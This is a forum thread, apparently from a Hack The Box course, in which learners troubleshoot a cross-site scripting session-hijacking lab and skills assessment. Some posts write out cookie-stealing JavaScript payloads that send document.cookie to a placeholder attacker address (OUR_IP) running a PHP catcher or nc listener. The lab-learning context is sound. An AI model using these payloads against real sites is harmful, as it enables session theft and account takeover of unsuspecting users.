Cross Site Scripting - Session Hijacking

Hello all, please again I am coming to you for help I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need I know that might have been a little confusing dm me if you don’t get my question.

Hi bro.

Can you explain again what is the issue? With more details and what you do for solve it, pls. To know what and why you’re stuck.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

Ok I dont know what I’m doing wrong. I got the php server set up. I sent my pay load:

">

I put it in the Full Name, User Name, and Image from individually and separate and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

Have the php server running and I’m getting the first link back to my web server (http://myIP/script.js)
But that script isn’t opening my index.php file

I’ve tried having document.location=‘http://OUR_IP/index.php?c=’+document.cookie;
and the new Image().src=‘http://OUR_IP/index.php?c=’+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue or how can I see why the 2nd call to index.php not going out?

Nevermind . The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff but eventually got the index.php to be called.

i said that i cant find the right payload
already tried all those listed ones…
i sent whit my tun address but they dont request my php or nc server neither.

tks

I’m getting the same as @paulorcsjr . I’ve very carefully done every single step according to the steps laid out in the write up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.